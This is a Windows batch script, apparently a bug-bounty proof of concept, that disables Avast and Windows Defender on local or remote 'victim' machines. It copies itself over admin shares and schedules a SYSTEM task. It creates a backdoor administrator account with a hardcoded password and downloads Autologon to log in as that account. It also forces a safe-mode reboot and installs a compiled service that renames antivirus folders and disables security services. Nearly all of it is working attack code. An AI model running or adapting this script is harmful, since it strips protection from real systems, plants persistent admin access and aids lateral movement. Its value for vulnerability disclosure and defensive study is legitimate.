REM - Author: Roberto Franceschetti REM - Usage - to disable AV on local machine: C:\>Avast-DisableAV-Remote.bat REM - Usage - to disable AV on remote machine: C:\>Avast-DisableAV-Remote.bat TargetComputerName (must be a hostname - IP won't work) IF NOT [%1] == [] (GOTO Remote) ELSE (GOTO Local) :Remote rem - we are exploiting a remote computer - copy script to victim and schedule task to execute it COPY "%~dp0Avast-DisableAV-Remote.bat" \\%1\C$\windows\temp\Avast-DisableAV-Remote.bat powershell -command "& {$time = [DateTime]::Now.AddMinutes(1);$hourMinute=$time.ToString('HH:mm');SchTasks.exe /Create /s %1 /SC ONCE /TN 'DisableAvast' /TR 'C:\Windows\temp\Avast-DisableAV-Remote.bat' /ST $hourMinute /F /RU 'SYSTEM' /RL HIGHEST }" GOTO :eof :Local rem - We are running .bat locally - run the exploit rem - create local admin account used to autologin on first safe boot net user AvastBounty "Avast123" /ADD net localgroup administrators AvastBounty /add rem - add autologin registry entries for next reboot powershell -command "& { iwr https://live.sysinternals.com/Autologon.exe -OutFile c:\windows\temp\Autologon.exe }" c:\windows\temp\Autologon.exe -accepteula AvastBounty . Avast123 rem - Now configure the next reboot in safe mode and autologin bcdedit /set {default} safeboot minimal rem - create the batch file executed by the DisableAvast service after the safe reboot rem - will rename ProgramFiles\Avast folders/filesystem drivers, disable WinDefender rem - will remove the safebot/autologon entries and reboot @echo off echo cd c:\windows\temp > c:\windows\temp\DisableAvastAV.bat echo ren "C:\Program Files\Avast Software" "Avast Software Disabled" >> c:\windows\temp\DisableAvastAV.bat echo ren "C:\Program Files\Windows Defender" "Windows Defender Disabled" >> c:\windows\temp\DisableAvastAV.bat echo ren "C:\Program Files\Windows Defender Advanced Threat Protection" "Windows Defender Advanced Threat Protection Disabled" >> c:\windows\temp\DisableAvastAV.bat echo ren "C:\Program Files (x86)\Windows Defender" "Windows Defender Disabled" >> c:\windows\temp\DisableAvastAV.bat echo ren "C:\ProgramData\Avast Software" "Avast Software Disabled" >> c:\windows\temp\DisableAvastAV.bat echo sc config "avast! Antivirus" start=disabled >> c:\windows\temp\DisableAvastAV.bat echo sc config "avast! Tools" start=disabled >> c:\windows\temp\DisableAvastAV.bat echo sc config "AvastWscReporter" start=disabled >> c:\windows\temp\DisableAvastAV.bat echo sc config "aswbIDSAgent" start=disabled >> c:\windows\temp\DisableAvastAV.bat echo sc config WinDefend start=disabled >> c:\windows\temp\DisableAvastAV.bat echo timeout /t 10 >> c:\windows\temp\DisableAvastAV.bat echo net stop SAVService >> c:\windows\temp\DisableAvastAV.bat echo net stop hmpalertsvc >> c:\windows\temp\DisableAvastAV.bat echo timeout /t 10 >> c:\windows\temp\DisableAvastAV.bat echo ren "C:\Program Files\Avast" Avast_Disabled >> c:\windows\temp\DisableAvastAV.bat echo reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /f /t REG_SZ /d "0" >> c:\windows\temp\DisableAvastAV.bat echo bcdedit /deletevalue {default} safeboot >> c:\windows\temp\DisableAvastAV.bat echo sc delete DisableAvast >> c:\windows\temp\DisableAvastAV.bat rem - echo pause >> c:\windows\temp\DisableAvastAV.bat echo shutdown /r /f /t 0 >> c:\windows\temp\DisableAvastAV.bat rem - now create the Powershell script that will create a "DisableAvastAV.exe" that will simply execute the DisableAvastAV.bat batch file above: rem - this is done as Windows 10 won't allow a service to run a .bat file, but a .exe will however run once just fine even if the service fails to start echo $source = @^" > c:\windows\temp\CreateService.ps1 echo using System; >> c:\windows\temp\CreateService.ps1 echo class Hello { >> c:\windows\temp\CreateService.ps1 echo static void Main() { >> c:\windows\temp\CreateService.ps1 echo System.Diagnostics.Process.Start(^"C:\\Windows\\Temp\\DisableAvastAV.bat^"); >> c:\windows\temp\CreateService.ps1 echo } >> c:\windows\temp\CreateService.ps1 echo } >> c:\windows\temp\CreateService.ps1 echo ^"@ >> c:\windows\temp\CreateService.ps1 echo Add-Type -TypeDefinition $source -Language CSharp -OutputAssembly ^"C:\Windows\Temp\DisableAvastAV.exe^" >> c:\windows\temp\CreateService.ps1 @echo on rem - now execute the powershell script to create the DisableAvastAV.exe file and install it as a service: powershell set-executionpolicy -executionpolicy bypass powershell c:\windows\temp\CreateService.ps1 sc create DisableAvast binpath="c:\windows\temp\DisableAvastAV.exe" start=auto rem - this entry will allow the DisableAvast service to run in Safeboot as well, otherwise it won't start: reg add HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\DisableAvast /f /t REG_SZ /d "service" rem - now reboot... Safe mode will be activated and the DisableAvastAV.exe service will run, calling the DisableAvastAV.bat script, renaming the Avast folders no longer protected by Tamper Protection rem - pause shutdown /r /f /t 0